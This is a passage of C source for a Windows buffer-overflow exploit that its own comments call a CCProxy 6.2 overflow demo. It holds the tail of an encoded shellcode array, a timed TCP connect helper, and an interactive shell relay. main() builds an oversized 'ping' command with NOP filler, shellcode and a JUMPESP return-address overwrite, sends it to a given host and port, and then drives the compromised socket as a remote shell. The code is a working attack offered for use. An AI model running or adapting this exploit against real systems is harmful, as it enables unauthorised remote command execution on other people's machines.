"\x3d\x53\xa6\xa1\x3b\x10\xfa\x07\x07\x07\xca\x8c\x69\xf4\x31\x44"
"\x5e\x93\x77\x0a\xe0\x99\x2b\x70\xd0\xb1\x58\x9d\x6f\x33\x8e\x68"
"\x6f\x3f\xaa\x7b\x11\x12";
// ripped from isno
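// ripped from isno
/*
 * Make_Connection - TCP connect with a timeout, returning a blocking socket.
 *
 * address: IPv4 address in dotted-quad form (inet_addr(); no name lookup).
 * port:    TCP port, host byte order.
 * timeout: seconds to wait for the connect to complete.
 *
 * Returns the socket as an int on success, else a negative code:
 *   -1 socket() failed           -2 address not parseable
 *   -3 select() failed           -4 timed out
 *   -5 connect failed (SO_ERROR) or getsockopt() returned an odd length.
 *
 * Two checks were fixed: SOCKET is unsigned, so the original "s < 0" never
 * detected a socket() failure, and inet_addr() reports failure as
 * INADDR_NONE rather than 0.
 */
int Make_Connection(char *address, int port, int timeout)
{
    struct sockaddr_in target;
    SOCKET s;
    int rc;
    int optlen;
    DWORD flag;
    fd_set wd;
    struct timeval tv;

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == INVALID_SOCKET)
        return -1;

    target.sin_family = AF_INET;
    target.sin_addr.s_addr = inet_addr(address);
    if (target.sin_addr.s_addr == INADDR_NONE || target.sin_addr.s_addr == 0)
    {
        closesocket(s);
        return -2;
    }
    target.sin_port = htons((u_short)port);

    /* Switch to non-blocking so connect() returns at once and select()
     * can wait for writability with the caller's timeout. */
    flag = 1;
    ioctlsocket(s, FIONBIO, &flag);
    tv.tv_sec = timeout;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s, &wd);
    connect(s, (struct sockaddr *)&target, sizeof(target));   /* WSAEWOULDBLOCK expected */

    rc = select((int)(s + 1), 0, &wd, 0, &tv);
    if (rc == SOCKET_ERROR)
    {
        closesocket(s);
        return -3;
    }
    if (rc == 0)
    {
        closesocket(s);
        return -4;    /* timeout */
    }

    /* Writable may also mean "failed"; SO_ERROR tells which. */
    optlen = sizeof(int);
    if (getsockopt(s, SOL_SOCKET, SO_ERROR, (char *)&flag, &optlen) != 0 ||
        flag != 0 || optlen != sizeof(int))
    {
        closesocket(s);
        return -5;
    }

    /* flag == 0 here, so this puts the socket back into blocking mode. */
    ioctlsocket(s, FIONBIO, &flag);
    return (int)s;
}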
/* ripped from TESO code and modifed by ey4s for win32 */
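/* ripped from TESO code and modifed by ey4s for win32 */
/*
 * shell - interactive relay between the console and a connected socket.
 *
 * sock: connected socket (a Windows SOCKET carried in an int).
 *
 * Each pass waits up to one second for the socket to become readable.
 * If it does, the data is written to stdout (fd 1); otherwise one read
 * from stdin (fd 0) is sent to the socket - so local input is only picked
 * up while the remote side is quiet.  Returns when either side closes or
 * a call fails.
 *
 * Changes vs. the original: a proper fd_set replaces the unsigned long[2]
 * that was cast to fd_set ({fd_count, fd_array[0]}), and a select() error
 * now ends the session instead of being treated as a timeout that fell
 * through to a blocking read of stdin.
 */
void shell(int sock)
{
    int n;
    char buf[512];
    struct timeval tv;
    fd_set readable;

    for (;;)
    {
        /* Rebuild the set and timeout each pass (the original re-set
         * ul[0] and ul[1] for the same reason). */
        FD_ZERO(&readable);
        FD_SET((SOCKET)sock, &readable);
        tv.tv_sec = 1;
        tv.tv_usec = 0;

        n = select(0, &readable, NULL, NULL, &tv);
        if (n == SOCKET_ERROR)
        {
            printf("[-] select error: %d\n", WSAGetLastError());
            return;
        }

        if (n == 1)
        {
            n = recv(sock, buf, sizeof(buf), 0);
            if (n <= 0)
            {
                printf("[-] Connection closed.\n");
                return;
            }
            n = write(1, buf, n);
            if (n <= 0)
            {
                printf("[-] Connection closed.\n");
                return;
            }
            continue;
        }

        /* Timeout: forward local input. */
        n = read(0, buf, sizeof(buf));
        if (n <= 0)
        {
            printf("[-] Connection closed.\n");
            return;
        }
        n = send(sock, buf, n, 0);
        if (n <= 0)
        {
            printf("[-] Connection closed.\n");
            return;
        }
    }
}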
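/*
 * main - CCProxy 6.2 overflow demo: deliver the match-string shellcode.
 *
 * Usage: exploit remote_addr remote_port
 *
 * Payload layout in Buff (3008 bytes), offsets as in the original:
 *   [0..4]       "ping " - the proxy command whose argument overflows,
 *   [5..]        0x90 filler,
 *   [9..318]     the pre-encoded shellcode,
 *   [1017..1020] JUMPESP, overwriting the saved return address,
 *   [3005..3007] "\r\n\0" ending the command line.
 * The target's banner is read, the payload is sent, one reply is read,
 * then the 4-byte marker "Xc0n" goes out on the same connection so the
 * shellcode's socket scan can identify it; that connection is then used
 * as the shell.
 *
 * Fixes vs. the original: the connect result is kept in an int (a SOCKET
 * is unsigned, so "s < 0" never fired), the port is validated instead of
 * atoi()'d, the banner recv() is checked, Buff is fully initialised before
 * the pieces are copied in, unused locals are gone, and the socket is
 * closed before exit.
 */
int main(int argc, char *argv[])
{
    int s;
    WSADATA WSAData;
    char Buff[3008], Recv[1024];
    char data[4] = "Xc0n";      /* deliberately unterminated: exactly 4 bytes are sent */
    int nRet;
    long port;
    char *end;

    if (argc < 3)
    {
        fprintf(stderr, "Usage: %s remote_addr remote_port", argv[0]);
        exit(1);
    }
    /* atoi() silently yields 0 on garbage; require a real TCP port. */
    port = strtol(argv[2], &end, 10);
    if (argv[2][0] == '\0' || *end != '\0' || port < 1 || port > 65535)
    {
        fprintf(stderr, "[-] invalid port: %s\n", argv[2]);
        exit(1);
    }

    if (WSAStartup(MAKEWORD(1, 1), &WSAData) != 0)
    {
        printf("[-] WSAStartup failed.\n");
        WSACleanup();
        exit(1);
    }

    memset(Buff, 0x90, sizeof(Buff));                     /* NOP fill */
    memcpy(&Buff[0], "ping ", 5);
    memcpy(&Buff[3005], "\r\n\0", 3);                      /* sizeof("ping ")+3000=3005 */
    memcpy(&Buff[1017], JUMPESP, 4);                       /* sizeof("ping ")+1012=1017 */
    memcpy(&Buff[9], shellcode, sizeof(shellcode) - 1);    /* sizeof("ping ")+4=9 */

    printf("[+] Connect %s Port %s\n", argv[1], argv[2]);
    s = Make_Connection(argv[1], (int)port, 10);
    if (s < 0)
    {
        printf("[-] connect err.\n");
        WSACleanup();
        exit(1);
    }

    /* Banner first; a closed connection here means there is no target. */
    memset(Recv, 0, sizeof(Recv));
    if (recv(s, Recv, sizeof(Recv), 0) <= 0)
    {
        printf("[-] no banner from target.\n");
        closesocket(s);
        WSACleanup();
        exit(1);
    }
    nRet = send(s, Buff, sizeof(Buff), 0);
    memset(Recv, 0, sizeof(Recv));
    recv(s, Recv, sizeof(Recv), 0); //Sleep(100);
    send(s, data, 4, 0);                                   /* marker for the socket scan */
    printf("[+] Send %d Bytes OK........\n[+] Wait For Connect To Shell\n", nRet);
    Sleep(1000);
    shell(s);
    closesocket(s);
    WSACleanup();
    return 0;
}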